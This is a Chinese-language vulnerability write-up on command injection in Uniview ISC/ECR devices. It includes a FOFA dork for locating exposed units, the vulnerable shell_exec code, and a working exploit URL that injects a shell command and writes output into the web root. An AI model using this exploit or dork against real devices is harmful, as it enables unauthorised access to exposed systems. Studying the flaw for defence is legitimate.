聲明
本文內容僅供學習交流使用,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者無關。
一、漏洞概述
此漏洞於2016年3月份提交,算是比較久遠的一個漏洞,但通過FOFA語句查詢,還是可以找到對應的設備驗證漏洞存在。
FOFA Dork:title=="ISC2500-S"
二、影響設備型號
ECR3316_HF ECR3316-HF ECR3308_HF ECR3308-HF ISC3500E ISC3500E ISC3500S ISC3500S ECR3316_HF_E ECR3316-HF-E ECR3308_HF_E ECR3308-HF-E ECR3316_HF_S ECR3316-HF-S ECR3308_HF_S ECR3308-HF-S ISC3500_ET ISC3500-ET ISC3500_EL ISC3500-EL ISC3500_ST ISC3500-ST ISC3500_SL ISC3500-SL ECR2104_HF ECR2104-HF ECR2108_HF ECR2108-HF ISC2500_SP ISC2500-SP ISC2500_EP ISC2500-EP ISC2500_E ISC2500-E ISC2500_S ISC2500-S ISC2500_L ISC2500-L ECR3308_HF_SC ECR3308-HF-SC ECR3316_HF_SC ECR3316-HF-SC ISC3500_LC ISC3500-LC ISC3500_SC ISC3500-SC ISC3500_EC ISC3500-EC ISC5000-E
三、白盒分析
在文件 /Interface/DevManage/VM.php 中:
..............代碼省略....................
// 設置DNS解析服務器地址
case 'setDNSServer' :
shell_exec('echo "nameserver '.$_REQUEST['DNSServerAdrr'].'"'.' > /etc/resolv.conf');
$result['Code'] = 0;
getTip($result);
echo json_encode($result);
break;
default :
showErrorRequest();
break;
...........................代碼省略.....................
四、EXP
/Interface/DevManage/VM.php?cmd=setDNSServer&DNSServerAdrr=" | whoami >/usr/local/program/ecrwww/apache/htdocs/Interface/DevManage/11.php %23"
五、后續思考
因考慮到可能會存在Web端弱口令漏洞,打算嘗試暴力破解。
手動輸入admin/admin,點擊登錄無反應。按照提示需要下載控件才可以使用,但經測試,這些設備因長期暴露在外網,且該漏洞時間已久,控件中包含WannaMine挖礦病毒,請謹慎下載。
六、修復意見
聯系廠商,升級應用的版本。廠商鏈接:https://cn.uniview.com/